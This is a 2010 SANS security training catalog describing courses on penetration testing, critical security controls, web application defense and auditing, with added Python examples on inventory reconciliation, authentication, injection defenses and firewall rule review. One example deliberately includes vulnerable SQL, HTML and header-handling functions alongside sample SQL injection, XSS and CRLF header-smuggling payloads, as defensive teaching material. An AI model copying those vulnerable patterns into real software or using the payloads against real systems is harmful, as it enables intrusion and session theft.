One of today’s most rapidly evolving and widely deployed technologies is server virtualization. Many organizations are already realizing the cost savings from implementing virtualized servers, and systems administrators love the ease of deployment and management for virtualized systems. There are even security benefits to virtualization – easier business continuity and disaster recovery, single points of control over multiple systems, role-based access, and additional auditing and logging capabilities for large infrastructures.
With these benefits comes a dark side, however. Virtualization technology is the focus of many new potential threats and exploits and presents new vulnerabilities that must be managed. In addition, there are a vast number of configuration options that security and system administrators need to understand, with an added layer of complexity that has to be managed by operations teams. Virtualization technologies also connect to network infrastructure and storage networks and require careful planning with regard to access controls, user permissions, and traditional security controls.
Prerequisites: Basic knowledge of systems and networking, some exposure to VMware ESX is helpful but not essential.
It cannot be stressed enough that if your laptop does not meet minimum configuration requirements, you will not be able to participate in this course.

SEC580: Metasploit Kung Fu for Enterprise Pen Testing
NEW Two-Day Course • 9:00am - 5:00pm • Sun, Sept 26 - Mon, Sept 27, 2010 • 12 CPE Credits • Laptop Required • Instructor: John Strand

Many enterprises today face regulatory or compliance requirements that mandate regular penetration testing and vulnerability assessments. Commercial tools and services for performing such tests can be expensive. While really solid free tools such as Metasploit are available, many testers do not understand the comprehensive feature sets of such tools and
how to apply them in a professional-grade testing methodology. Metasploit was designed to help testers with confirming
vulnerabilities using an Open Source and easy to use framework. This Official Metasploit Course will help students get the
most out of this free tool. Learn how to apply the incredible capabilities of the Metasploit Framework in a comprehensive
penetration testing and vulnerability assessment regimen, according to a thorough methodology for performing effective
tests. Upon completion, you will have a firm understanding of how Metasploit can fit into your penetration testing and
day-to-day assessment activities.

SECURITY

566
Five-Day Program • Mon, Sept 20 - Fri, Sept 24, 2010 • 9:00am - 5:00pm
30 CPE Credits • Laptop Required • Instructor: Bryce Galbraith

This course helps you master specific, proven techniques and tools needed to implement and audit the Top Twenty Most Critical Security Controls.

These Top 20 Security Controls, listed below, are rapidly becoming accepted as the highest priority list of what must be done and proven before anything else at nearly all serious and sensitive organizations. These controls were selected and defined by the US military and other government and private organizations (including NSA, DHS, GAO, and many others) who are the most respected experts on how attacks actually work and what can be done to stop them. They defined these controls as their consensus for the best way to block the known attacks and the best way to help find and mitigate damage from the attacks that get through. For security professionals, the course enables you to see how to put the controls in place in your existing network through effective and widespread use of cost-effective automation. For auditors, CIOs, and risk officers, the course is the best way to understand how you will measure whether the Top 20 controls are effectively implemented. It closely reflects the Top 20 Critical Security Controls found at http://www.sans.org/critical-security-controls.

One of the best features of the course is that it uses offense to inform defense. In other words, you will learn about the actual attacks that you'll be stopping or mitigating. That makes the defenses very real, and it makes you a better security person.

Who Should Attend
• Information assurance auditors
• System implementers/administrators
• Network security engineers
• IT administrators
• DoD personnel/contractors
• Federal agencies/clients
• Private sector organizations looking for information assurance priorities for securing their systems
• Security vendors and consulting groups looking to stay current with frameworks for information assurance
• Alumni of SEC/AUD440, SEC401, SEC501, SANS Audit classes, and MGT512

Top 20 Critical Security Controls

Critical Controls Subject to Automated Collection, Measurement, and Validation:
1 Inventory of Authorized and Unauthorized Devices
2 Inventory of Authorized and Unauthorized Software
3 Secure Configurations for Hardware and Software on Laptops, Workstations, and Servers
4 Secure Configurations of Network Devices Such as Firewalls, Routers, and Switches
5 Boundary Defense
6 Maintenance and Analysis of Security Audit Logs
7 Application Software Security
8 Controlled Use of Administrative Privileges
9 Controlled Access Based On Need to Know
10 Continuous Vulnerability Assessment and Remediation
11 Account Monitoring and Control
12 Malware Defenses
13 Limitation and Control of Network Ports, Protocols, and Services
14 Wireless Device Control
15 Data Loss Prevention

Additional Critical Controls (not directly supported by automated measurement and validation):
16 Secure Network Engineering
17 Penetration Tests and Red Team Exercises
18 Incident Response Capability
19 Data Recovery Capability
20 Security Skills Assessment and Training to Fill Gaps
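Controls 1 and 2 above are the ones the list marks as subject to automated collection and measurement. The following is an added example, not course material and not a SANS tool: it reconciles a constructed list of hosts observed on the network (what an ARP sweep or DHCP lease dump would produce) and the software reported on each against a constructed authorized inventory, and reports unauthorized devices, unapproved software, and inventory entries that were never seen. The inventory columns, the role names, and the observation format are assumptions chosen for illustration.

```python
"""Reconcile observed devices and software against an authorized inventory.

Added example (not SANS course material). The inventory and observation
formats below are assumptions chosen for illustration.
"""
import csv
import io
from dataclasses import dataclass, field

# Constructed authorized inventory: one row per device plus its role.
# Real data would come from a CMDB or asset database.
AUTHORIZED_CSV = """mac,hostname,role
00:11:22:33:44:01,ws-alice,workstation
00:11:22:33:44:02,ws-bob,workstation
00:11:22:33:44:10,db-01,server
"""

# Constructed allowlist of software per role (Control 2).
APPROVED_SOFTWARE = {
    "workstation": {"firefox", "openoffice", "antivirus"},
    "server": {"postgresql", "openssh", "antivirus"},
}

# Constructed observations, as an ARP sweep plus a software agent would report.
OBSERVED = [
    {"mac": "00:11:22:33:44:01", "ip": "10.0.0.11", "software": {"firefox", "antivirus"}},
    {"mac": "00:11:22:33:44:02", "ip": "10.0.0.12", "software": {"firefox", "antivirus", "bittorrent"}},
    {"mac": "00:11:22:33:44:10", "ip": "10.0.0.20", "software": {"postgresql", "openssh", "antivirus"}},
    {"mac": "DE:AD:BE:EF:00:01", "ip": "10.0.0.99", "software": set()},  # not in inventory
]


@dataclass
class Findings:
    unauthorized_devices: list = field(default_factory=list)  # (mac, ip)
    unapproved_software: list = field(default_factory=list)   # (hostname, package)
    missing_devices: list = field(default_factory=list)       # hostnames never observed


def load_inventory(text: str) -> dict:
    """Parse the authorized inventory, keyed by lower-cased MAC address."""
    rows = csv.DictReader(io.StringIO(text))
    return {row["mac"].lower(): row for row in rows}


def reconcile(inventory: dict, observed: list) -> Findings:
    """Compare what was seen on the wire with what is authorized (Controls 1 and 2)."""
    findings = Findings()
    seen = set()
    for obs in observed:
        mac = obs["mac"].lower()
        entry = inventory.get(mac)
        if entry is None:
            # Control 1: a device on the network that the inventory does not know.
            findings.unauthorized_devices.append((mac, obs["ip"]))
            continue
        seen.add(mac)
        approved = APPROVED_SOFTWARE.get(entry["role"], set())
        # Control 2: software present that is not approved for this role.
        for pkg in sorted(obs["software"] - approved):
            findings.unapproved_software.append((entry["hostname"], pkg))
    # Inventory entries never observed are stale records or offline assets;
    # either way the inventory needs attention.
    for mac, entry in inventory.items():
        if mac not in seen:
            findings.missing_devices.append(entry["hostname"])
    return findings


if __name__ == "__main__":
    result = reconcile(load_inventory(AUTHORIZED_CSV), OBSERVED)
    print("Unauthorized devices:", result.unauthorized_devices)
    print("Unapproved software: ", result.unapproved_software)
    print("Not observed:        ", result.missing_devices)
```

Run unattended, the same comparison produces the measurement the course describes: the count of unauthorized devices and packages per run is a number management can track, and a run that suddenly reports zero unauthorized devices is as worth investigating as one that reports many.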

Certified Instructor
Bryce Galbraith
Bryce began his IT journey at 10 years of age with a Commodore 64 and a 300 baud modem. As a contributing author of the internationally bestselling book Hacking Exposed: Network Security Secrets & Solutions, Bryce helped bring the secret world of hacking out of the darkness and into the public eye. Bryce has held security positions at global ISPs and Fortune 500 companies as well as being a senior member of Foundstone's world renowned attack and penetration team. Bryce also served as senior instructor and co-author of Foundstone's Ultimate Hacking: Hands-On series. He has taught the art of ethical hacking and countermeasures to thousands of IT professionals from a "who's who" of top companies, financial institutions, and government agencies around the globe. Bryce teaches SEC504, SEC560, and SEC401 for SANS. Bryce is an active member of several security-related professional organizations, speaks at a variety of conferences, and holds a number of certifications: CISSP, GCIH, GSEC, CEH, CHFI, Security+, and CCNA. Bryce is currently lead consultant and co-founder of Layered Security. Bryce also blogs about security issues at http://blog.layeredsec.com.

SEC301
Five-Day Program • Mon, Sept 20 - Fri, Sept 24, 2010 • 9:00am - 5:00pm
30 CPE Credits • Instructor: Fred Kerby

This introductory certification course is the fastest way to get up to speed in information security.

Written and taught by battle-scarred security veterans, this entry-level course covers a broad spectrum of security topics and is liberally sprinkled with real life examples. A balanced mix of technical and managerial issues makes this course appealing to attendees who need to understand the salient facets of information security and risk management. Organizations often tap someone who has no information security training and say, "Congratulations, you are now a security officer." If you need to get up to speed fast, Security 301 rocks!

We begin by covering basic terminology and concepts, and then move to the basics of computers and networking as we discuss Internet Protocol, routing, Domain Name Service, and network devices. We cover the basics of cryptography and wireless networking, then we look at policy as a tool to effect change in your organization. In the final day of the course, we put it all together with an introduction to defense in-depth.

If you're a newcomer to the field of information security, this is the course for you! You will develop the skills to bridge the gap that often exists between managers and system administrators and learn to communicate effectively with personnel in all departments and at all levels within your organization.

This is the course SANS offers for the professional just starting out in security. If you have experience in the field, please consider our more advanced offerings, such as SEC401: SANS Security Essentials Bootcamp Style.

Who Should Attend
• Persons new to information technology (IT) who need to understand the basics of information assurance, computer networking, cryptography, and risk evaluation
• Managers and information security officers who need a basic understanding of risk management and the tradeoffs between confidentiality, integrity, and availability
• Managers, administrators, and auditors who need to draft, update, implement, or enforce policy

"This fundamental course sets the groundwork for a successful future in IT security." -BRIAN FRICKE, US NAVY/MSC

Senior Instructor
Fred Kerby
Fred is an engineer, manager, and security practitioner whose experience spans several generations of networking. He is the information assurance manager at the Naval Surface Warfare Center, Dahlgren Division and has vast experience with the political side of security incident handling. His team is one of the recipients of the SANS Security Technology Leadership Award as well as the Government Technology Leadership Award. Fred received the Navy Meritorious Civilian Service Award in recognition of his technical and management leadership in computer and network security. A frequent speaker at SANS, Fred's presentations reflect his opinions and are not the opinions of the Department of the Navy.

GIAC Certification: www.giac.org • DoD 8570 Required: www.sans.org/8570
DEV522
Six-Day Program • Mon, Sept 20 - Sat, Sept 25, 2010 • 9:00am - 5:00pm
36 CPE Credits • Laptop Required • Instructor: Johannes Ullrich, PhD

Defending Web applications is critical!

In battle an attacker is exposed and at a massive disadvantage when fighting against a well entrenched defender. This course will teach you how to build defense-in-depth, allowing you to detect and expose an attacker early. Learn about the 'tripwires and obstacles' that savvy defenders use to detect, channel, and thwart attacks! The course material distills the experience of two top defenders of embattled Web sites, and builds on the industry consensus research of the CWE/SANS Top 25 programming errors (CWE 25) and the OWASP Top 10. Mitigation strategies from an infrastructure, architecture, and coding perspective will be discussed alongside real-world implementations that really work. The testing aspect of vulnerabilities will also be covered so you can ensure your application is tested for the vulnerabilities discussed in class. The class goes beyond classic Web applications and includes coverage of Web 2.0 technologies like AJAX and Web services. To maximize the benefit for a wider range of audiences, the discussions in this course will be programming language agnostic. Focus will be maintained on security strategies rather than coding level implementation.

Who Should Attend
• Application developers
• Application security analysts or managers
• Application architects
• Penetration testers who are interested in learning about defense strategies
• Security professionals who are interested in learning about application security
• Auditors who need to understand defensive mechanisms in applications

The course will cover the topics outlined by OWASP's Top 10 risks document, as well as additional issues the authors found of importance in their day-to-day Web application development practice. Examples of the topics that will be covered include:
• Infrastructure security
• Server configuration
• Authentication mechanisms
• Application language configuration
• Application coding errors like SQL injection and cross site scripting
• Cross-site request forgery
• Authentication bypass
• Web services and related flaws
• Web 2.0 and its use of Web services
• XPATH and XQUERY languages and injection
• Business logic flaws

The course will make heavy use of hands-on exercises. It will conclude with a large defensive exercise, reinforcing the lessons learned throughout the week.

This course covers the OWASP Top 10 and the CWE/SANS Top 25 Programming Errors which are important in Java development.

AUTHOR STATEMENT
Too many Websites are getting compromised these days. Our goal for this course is to arm the students with defensive strategies that can work for all Web applications. We all know it is very difficult to defend a Web application; there are so many different types of vulnerabilities and attack channels. Overlook one thing and your Web app is owned. The defensive perimeter needs to extend far beyond just the coding aspects of Web application. In this course, we cover the security vulnerabilities so students have a good understanding of the problems at hand. We then provide the defensive strategies and tricks as well as overall architecture that are proven to help secure sites. I have also included some case studies throughout the course so we can learn from the mistakes of others and make our own defense stronger. The exercises in class were designed to help you further the understanding and help retain the knowledge by hands-on practice. By the end of the course, you will have the practical skills and understanding of the defensive strategies to lock down existing applications, as well as building more secure applications in the future. -Jason Lam and Johannes Ullrich, PhD
522.1 Hands On: Web Basics and Authentication Security*
We begin with an overview of the software development life cycle and security. Proper security control and process during development is essential to having secure applications, as well as the essential technologies that are at play in Web applications. You can't win the battle if you don't understand what you are trying to defend. Learn how Web applications work and the security concepts related to them. We discuss the authentication aspect of Web applications in depth, including the vulnerabilities, followed by examples of exploitation and the mitigations that could be implemented in the short and long term. Learn the right way of planning for access during the development life cycle and the common pitfalls with access control by starting with the vulnerabilities, mitigation and testing, followed by a section on the best practice on authorization.
Topics: HTTP Basics; Overview of Web Technologies; Web Application Architecture; Recent Attack Trends; Authentication Vulnerabilities and Defense; Authorization Vulnerabilities and Defense
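The two pitfalls named for day one, as an added example that is not course material or SANS code: passwords verified against per-user salted PBKDF2 digests with a constant-time comparison (so timing does not reveal how much of a guess matched, and unknown usernames cost the same as wrong passwords), and a record lookup that enforces ownership instead of trusting a client-supplied record ID. The user table, the role names, the order records and the function names are all constructed for illustration.

```python
"""Authentication and authorization checks for a Web application.

Added example, not course material. Users, roles and order records are constructed.
"""
import hashlib
import hmac
import os
from typing import Optional, Tuple

PBKDF2_ROUNDS = 100_000  # raise as hardware allows; the point is cost per guess


def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Return (salt, digest). A fresh random salt per user defeats precomputed tables."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)
    return salt, digest


def verify_password(password: str, salt: bytes, expected: bytes) -> bool:
    """Recompute and compare in constant time; a plain == returns early on the
    first differing byte and leaks how close the guess was."""
    _, digest = hash_password(password, salt)
    return hmac.compare_digest(digest, expected)


# Constructed user store and a constructed "orders" table owned by users.
USERS = {}
for _name, _pw in (("alice", "correct horse"), ("bob", "hunter2")):
    _salt, _digest = hash_password(_pw)
    USERS[_name] = {"salt": _salt, "digest": _digest, "role": "user"}
USERS["alice"]["role"] = "admin"

ORDERS = {
    1001: {"owner": "alice", "total": 42.0},
    1002: {"owner": "bob", "total": 17.5},
}


def login(username: str, password: str) -> Optional[str]:
    """Return the authenticated username, or None. An unknown username still
    pays for a PBKDF2 run so response time does not reveal which accounts exist."""
    user = USERS.get(username)
    if user is None:
        hash_password(password, b"\x00" * 16)  # dummy work, result discarded
        return None
    return username if verify_password(password, user["salt"], user["digest"]) else None


def get_order(current_user: str, order_id: int) -> Optional[dict]:
    """The authorization pitfall is returning whatever record the request names.
    Here the record is released only to its owner or to an admin, and a
    forbidden record looks exactly like a missing one to the caller."""
    order = ORDERS.get(order_id)
    if order is None:
        return None
    if order["owner"] != current_user and USERS[current_user]["role"] != "admin":
        return None
    return order


if __name__ == "__main__":
    print(login("alice", "correct horse"))  # alice
    print(login("alice", "wrong"))          # None
    print(get_order("bob", 1002))           # bob's own order
    print(get_order("bob", 1001))           # alice's order: None
```

The ownership check lives next to the data access rather than in the page that renders the link, which is what keeps a user from simply editing the ID in the URL.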

522.2 Hands On: Web Application Common Vulnerabilities and Mitigations*
Since the Internet does not guarantee secrecy of information being transferred, encryption is commonly used to protect the integrity and secrecy of information on the Web. We cover the security of data in transit or on disk and how encryption can help with securing that information in the context of Web application security. We discuss session management in Web applications, the techniques attackers use against the session mechanism, and the related defense strategies. The best practices of session security and cross-site request forgery are discussed to ensure your application's session management is as strong as possible. Then we cover business logic flaws and concurrency, topics that automated scanners find difficult to detect. The day ends with input-related flaws and SQL injection, the basic mechanics of these vulnerabilities, followed by the real-world attack trends. We delve into the mitigation and the best practice in avoiding these critical vulnerabilities.
Topics: SSL Vulnerabilities and Testing; Proper Encryption Use in Web Application; Session Vulnerabilities and Testing; Cross-site Request Forgery; Business Logic Flaws; Concurrency; Input Related Flaws and Related Defense; SQL Injection Vulnerabilities, Testing, and Defense

522.3 Hands On: Proactive Defense and Operation Security*
Day three begins with a detailed discussion on cross-site scripting, related mitigation, and testing strategy, as well as HTTP response splitting. Defending the platform and host by locking down the Web environment is an essential topic. We will discuss the correct approach to handling incidents and handling logs and the intrusion detection aspect of Web application security. Then we will turn our focus to proactive defense mechanisms so that we stay ahead of the attackers. Topics such as file upload handling, intrusion detection, honeypots, redirection, in-depth authentication information, and practical input validation strategy will be covered. This information will give you the extra edge in defending your application.
Topics: Web Environment Configuration Security; Intrusion Detection in Web Application; Incident Handling; Honeytoken

522.4 Hands On: AJAX and Web Services Security*
Day four is dedicated to AJAX and Web services security. Asynchronous JavaScript and XML (AJAX) and Web services are currently the most active areas in Web application development. Security issues continue to arise as organizations dive head first into insecurely implementing new Web technologies without first understanding them. We cover the security issues, mitigation strategies, and general best practices for implementing AJAX and Web services. We also examine real-world attacks and trends to give you a better understanding of exactly what you're protecting against. Discussion focuses on Web services in the morning and AJAX technologies in the afternoon.
Topics: Web Services Overview; Security in Parsing of XML; XML Security; AJAX Technologies Overview; AJAX Attack Trends and Common Attacks; AJAX Defense

522.5 Hands On: Cutting-Edge Web Security*
Day five has a strong focus on cutting-edge Web application technologies and current research areas. Clickjacking and DNS rebinding are difficult to defend against and require multiple defense strategies to be successful. We cover the new generation of single sign-on solutions such as OpenID, the implications of using these authentication systems, and the common gotchas to avoid. With Web 2.0 adoption, the use of Java applets, Flash, ActiveX, and Silverlight is on the increase. The security strategies for defending these technologies are discussed so these client-side technologies can be locked down properly.
Topics: Clickjacking; DNS Rebinding; Flash Security; Java Applet Security; Single Sign On Solution and Security; IPv6 Impact on Web Security

522.6 Hands On: Capture & Defend the Flag Exercise*
Day six starts with an introduction to the secure software development life cycle and how to apply it to Web development. The major focus is a large lab which ties the lessons learned during the week together and reinforces the lessons by practicing them hands on. You are provided with a virtual machine implementing a complete database driven dynamic Web site. A custom tool is used to enumerate security vulnerabilities and simulate a vulnerability assessment of the Web site. It will be up to you to decide which vulnerabilities are real and which are false positives. You are then asked to mitigate the vulnerabilities. The scanner will score students as vulnerabilities are eliminated immediately or checked off as false positives. Advanced students will be able to extend this exercise and find vulnerabilities not presented by the scanner. You will learn hands on how to secure the Web application, starting with the operating system, the Web server, finding configuration problems in the application language setup, and finding and fixing coding problems in the site.
Topics: Mitigation of Server Configuration Errors; Discovering and Mitigating Coding Problems; Testing Business Logic Issues and Fixing Problems; Web Services Testing and Security Problem Mitigation

*This course is available to Developer 522 participants only.

Certified Instructor
Johannes Ullrich, PhD
As chief research officer for the SANS Institute, Johannes is currently responsible for the SANS Internet Storm Center (ISC) and the GIAC Gold program. He founded DShield.org in 2000, which is now the data collection engine behind the ISC. His work with the ISC has been widely recognized, and in 2004, Network World named him one of the 50 most powerful people in the networking industry. Prior to working for SANS, Johannes worked as a lead support engineer for a Web development company and as a research physicist. Johannes holds a PhD in Physics from SUNY Albany and is located in Jacksonville, Florida. He also enjoys blogging about application security tips. https://blogs.sans.org/appsecstreetfighter.

"Excellent usable information and lots of it. This will really help in my company's PCI compliance efforts." -SIMON MINER, CHRISTIANBOOK.COM
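The input-related flaws covered on days two and three above (SQL injection in 522.2, cross-site scripting and HTTP response splitting in 522.3) share one shape: untrusted text reaches a sink that interprets it. The following is an added example, not course material or any SANS code, showing each flaw beside its mitigation: a bound query parameter instead of string concatenation, HTML output encoding instead of raw insertion, and outright rejection of CR/LF in a header value instead of an attempt to sanitize it. The in-memory user table, the payloads and the handler names are constructed for illustration.

```python
"""Three input-to-sink defenses: SQL query parameters, HTML output encoding,
and CRLF rejection in response headers.

Added example, not course material. The table, the inputs and the handler
names are constructed for illustration.
"""
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for a real user store."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, name: str) -> list:
    """String concatenation: a quote in the input changes the query's structure."""
    sql = "SELECT name FROM users WHERE name = '" + name + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn: sqlite3.Connection, name: str) -> list:
    """Bound parameter: the input is only ever data, never part of the SQL."""
    return [row[0] for row in conn.execute("SELECT name FROM users WHERE name = ?", (name,))]


def render_greeting_vulnerable(name: str) -> str:
    """Reflected XSS: untrusted text placed into HTML as-is."""
    return "<p>Hello, " + name + "</p>"


def render_greeting(name: str) -> str:
    """Output encoding for an HTML text node. Other contexts (attributes, URLs,
    JavaScript strings) need their own encoders; one escape does not fit all."""
    return "<p>Hello, " + html.escape(name, quote=True) + "</p>"


def set_location_vulnerable(headers: list, value: str) -> list:
    """Response splitting: CR/LF in the value lets the attacker append headers
    or an entire second response body."""
    headers.append("Location: " + value)
    return headers


def set_location(headers: list, value: str) -> list:
    """Refuse control characters rather than trying to strip them."""
    if "\r" in value or "\n" in value:
        raise ValueError("control characters in header value")
    headers.append("Location: " + value)
    return headers


if __name__ == "__main__":
    conn = make_db()
    payload = "x' OR '1'='1"
    print(lookup_vulnerable(conn, payload))      # every user
    print(lookup_parameterized(conn, payload))   # nobody
    print(render_greeting("<script>alert(1)</script>"))
    try:
        set_location([], "/home\r\nSet-Cookie: session=evil")
    except ValueError as err:
        print("rejected:", err)
```

Note that the parameterized query still returns nothing for the payload because the whole string, quotes and all, is compared against the name column; no filtering of quotes was needed, and none should be relied on.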
AUD507: Auditing Networks, Perimeters, and Systems
Six-Day Program • Mon, Sept 20 - Sat, Sept 25, 2010 • 9:00am - 5:00pm
36 CPE Credits • Laptop Required • Instructor: David Hoelzer

One of the most significant obstacles facing many auditors today is how exactly to go about auditing the security of an enterprise.

What systems really matter? How do we prioritize the audits that need to be performed and determine the scope of each? How do you validate the security of the perimeter? What settings should be checked on the various systems under scrutiny? Which set of processes can be put into place to allow an auditor to focus on the business processes rather than the security settings?

This course is organized specifically to provide a risk-driven method for tackling the enormous task of designing an enterprise security validation program. After covering high-level audit issues and general audit best practice, students will have the opportunity to dive into the technical how-to for determining the key controls that can be used to provide a level of assurance to an organization. Tips on how to repeatedly verify these controls and techniques for automatic compliance validation will come from real-world examples.

One of the struggles that IT auditors face is helping management understand the relationship between the technical controls and the risks to the business. The instructor will use validated information from real-world situations to explain how they can be used to raise the awareness of management and others within the organization to understand why these controls specifically, and auditing in general, is important.

Each student is invited to bring a Windows XP Professional or higher laptop for use during class. Macintosh computers running OS X may also be used with VMware Fusion.

A great audit is more than marks on a checklist; it is the understanding of the underlying controls, knowing what the best practices are, and having enough information to understand why. Sign up for this course and experience the mix of theory, hands-on, and practical knowledge.

Who Should Attend
• Auditors seeking to identify key controls in IT systems
• Audit professionals looking for technical details on IT auditing
• Managers responsible for overseeing the work of an IT audit or security team
• Security professionals newly tasked with audit responsibilities
• System and network administrators looking to better understand what an auditor is trying to achieve, how they think, and how to better prepare for an audit
• System and network administrators seeking to create strong change control management and detection systems for the enterprise

AUTHOR STATEMENT
This advanced systems audit course stands alone in the information assurance arena as the only comprehensive source for hands-on audit how-to. Past students have included long-time auditors and those new to the field, both of whom have found significant benefit from the refresher material. A vice president with the Institute of Internal Auditors said, "I've been auditing systems for a very long time, and no one ever actually gave me a formal process that I can apply to conducting technical audits. Thank you!" While we don't require a high level of technical experience as a prerequisite to this course, we have worked hard to make sure that anyone who comes to the course walks away with a wealth of material that they can go back to their office and apply tomorrow. We realistically address the problem -- how do I get there from here? -- by offering short-term goal solutions, which, when combined, will allow you to achieve your goal: identify, report on, and reduce risk in your enterprise.
-David Hoelzer

GIAC Certification: www.giac.org • DoD 8570 Required: www.sans.org/8570 • STI Masters Program: www.sans.edu
Auditing Networks, Perimeters, and Systems is a hands-on course and is the most comprehensive, most technically advanced audit course on planet earth! Entry level IT auditors tend to earn $40,000 - $65,000 while more advanced auditors can earn up to $95,000. Those with the coveted GSNA certification often earn 8% more than those without.

507.1 Audit Principles, Risk Assessment, and Effective Reporting
In addition to filling in any foundational gaps that you might have in auditing principles, this day's material will give you two extremely useful risk assessment methods that are effective in measuring the security of a system and identifying weak or non-existent controls. Following this discussion, you will be able to analyze an existing set of controls, a business process, an audit exception, or a security incident, identify any missing or ineffective controls, and identify what corrective actions will eliminate the problem in the future.
Topics: Auditor's Role in Relation to Policy Creation, Policy Conformance, and Incident Handling; Benefits of Various Auditing Standards and Certifications; Basic Auditing and Assessing Strategies; Risk Assessment; The Six-step Audit Process

SANS Faculty Fellow
David Hoelzer
With more than twenty years of experience, David has served in positions ranging from the highly technical to senior management for a variety of organizations. For the last ten years, David has been the director of research for Cyber-Defense and the principal examiner for Enclave Forensics. In addition to day-to-day responsibilities, he has acted as an expert witness for the Federal Trade Commission and continues to teach at major SANS events, teaching security professionals from organizations including NSA, USDA Forest Service, Fortune 500 security engineers and managers, DHHS, various DoD sites, national laboratories, and many colleges and universities. From time to time David also speaks nationally and internationally on various security topics. David also blogs about IT Audit issues at the SANS IT Audit blog. https://blogs.sans.org/it-audit

507.2 Hands On: Auditing the Perimeter
Focus on some of the most sensitive and important parts of our information technology infrastructure: routers and firewalls. In order to properly audit a firewall or router, we need to clearly understand the total information flow that is expected for the device. Diagrams will allow the auditor to identify what objectives the routers and firewalls are seeking to meet, thus allowing controls to be implemented which can be audited. Overall, this course will teach the student everything needed to audit routers, switches, and firewalls in the real world.
Topics: Overview; Detailed Audit of a Router; Auditing Switches; Testing the Firewall; Testing the Firewall Rulebase; Testing Third-Party Software; Reviewing Logs and Alerts; The Tools Used

507.3 Hands On: Network Auditing Essentials
This day continues where day two left off, extending network and perimeter auditing to internal system validation and vulnerability testing, helping network security professionals to see how to use the tools and techniques described to audit, assess, and secure a network in record time. Following a defense-in-depth approach, learn how to audit perimeter devices, create maps of active hosts and services, and assess the vulnerability of those services. Hands-on exercises are conducted throughout the day so students have the opportunity to use the tools.
Topics: Introduction; War Dialing; Wireless; Mapping Your Network; Configuration Auditing of Key Services; Analyzing the Results; Follow-on Activities

507.4 Hands On: Web Application Auditing
We'll start with the underlying principles of Web technology and introduce a set of tools that can be used to validate the security of these applications. Then we will build and work through a checklist for validating the existence and proper implementation of controls to mitigate the primary threats found in Web applications.
Topics: Identify Controls Against Information Gathering Attacks; Process Controls to Prevent Hidden Information Disclosures; Control Validation of the User Sign-on Process; Examining Controls Against User Name Harvesting; Validating Protections Against Password Harvesting; Best Practices for OS and Web Server Configuration; How to Verify Session Tracking and Management Controls; Identification of Controls to Handle Unexpected User Input; Server-side Techniques for Protecting Your Customers and Their Sensitive Data

507.5 Hands On: Advanced Windows Auditing
Systems based on the Windows NT line (XP, 2003, Vista, 2008 and Windows 7) make up a large part of the typical IT infrastructure. Quite often, these systems are also the most difficult to effectively secure and control. This class gives you the keys, techniques, and tools to build an effective long term audit program for your Microsoft Windows environment.
Topics: Progressive Construction of a Comprehensive Audit Program; Automating the Audit Process; Windows Security Tips and Tricks; Maintaining a Secure Enterprise
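Testing the firewall rulebase, listed under 507.2 above, starts with two questions an auditor can answer from the rule listing alone: which rules can never fire because an earlier rule already matches everything they would match, and which permits are so broad they amount to no control. The following is an added example, not course material or any vendor's tool. It uses a constructed, vendor-neutral rule format (action, source network, destination network, protocol, port) with first-match semantics; real rulebases add negation, object groups, port ranges and stateful behavior, so treat the output as a list of questions for the firewall owner, not as findings.

```python
"""Rulebase review: flag rules that can never match (shadowed by an earlier rule)
and permits with any source, any destination and any service.

Added example, not course material or a vendor tool. The rule format is a
constructed simplification: (action, src, dst, proto, port), first match wins,
where proto and port may be a specific value or "any".
"""
import ipaddress
from typing import List, Tuple

Rule = Tuple[str, str, str, str, str]  # action, src, dst, proto, port

# Constructed rulebase in evaluation order, numbered 1..6 for the report.
RULEBASE: List[Rule] = [
    ("deny",   "10.0.5.0/24",  "0.0.0.0/0",       "any", "any"),  # 1 quarantine segment
    ("permit", "10.0.0.0/16",  "192.168.1.10/32", "tcp", "443"),  # 2 intranet to web
    ("permit", "10.0.0.0/16",  "192.168.1.10/32", "tcp", "any"),  # 3 broader than 2 (2 is then redundant, a separate finding)
    ("permit", "10.0.1.0/24",  "192.168.1.10/32", "tcp", "443"),  # 4 shadowed by 2
    ("permit", "10.0.5.7/32",  "192.168.1.20/32", "tcp", "22"),   # 5 shadowed by the quarantine deny
    ("permit", "0.0.0.0/0",    "0.0.0.0/0",       "any", "any"),  # 6 any-any permit
]


def _covers(outer: str, inner: str) -> bool:
    """True if network `outer` contains all of network `inner`."""
    o = ipaddress.ip_network(outer, strict=False)
    i = ipaddress.ip_network(inner, strict=False)
    return i.subnet_of(o)


def _field_covers(outer: str, inner: str) -> bool:
    """For proto/port: 'any' covers everything, otherwise the values must match."""
    return outer == "any" or outer == inner


def rule_covers(earlier: Rule, later: Rule) -> bool:
    """True if every packet that would hit `later` is already matched by `earlier`."""
    _, s1, d1, p1, port1 = earlier
    _, s2, d2, p2, port2 = later
    return (_covers(s1, s2) and _covers(d1, d2)
            and _field_covers(p1, p2) and _field_covers(port1, port2))


def find_shadowed(rules: List[Rule]) -> List[Tuple[int, int]]:
    """Return (shadowed_rule_no, shadowing_rule_no), 1-based, for rules that never fire.
    The shadowing rule's action does not matter: a permit behind an earlier deny is
    just as dead as a duplicate permit, and either one deserves a question."""
    out = []
    for j, later in enumerate(rules):
        for i, earlier in enumerate(rules[:j]):
            if rule_covers(earlier, later):
                out.append((j + 1, i + 1))
                break
    return out


def find_broad_permits(rules: List[Rule]) -> List[int]:
    """1-based numbers of permits that match any source, any destination and any service."""
    return [n + 1 for n, (action, s, d, p, port) in enumerate(rules)
            if action == "permit" and _covers(s, "0.0.0.0/0") and _covers(d, "0.0.0.0/0")
            and p == "any" and port == "any"]


if __name__ == "__main__":
    for dead, by in find_shadowed(RULEBASE):
        print("rule %d can never match: shadowed by rule %d" % (dead, by))
    for n in find_broad_permits(RULEBASE):
        print("rule %d permits everything from everywhere" % n)
```

A shadowed rule is not always a mistake (it may be a leftover from a change that was reverted), but it is always a question: the person who added it expected it to do something, and the rulebase as written says it does nothing.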
507.6 Hands On: Auditing Unix Systems
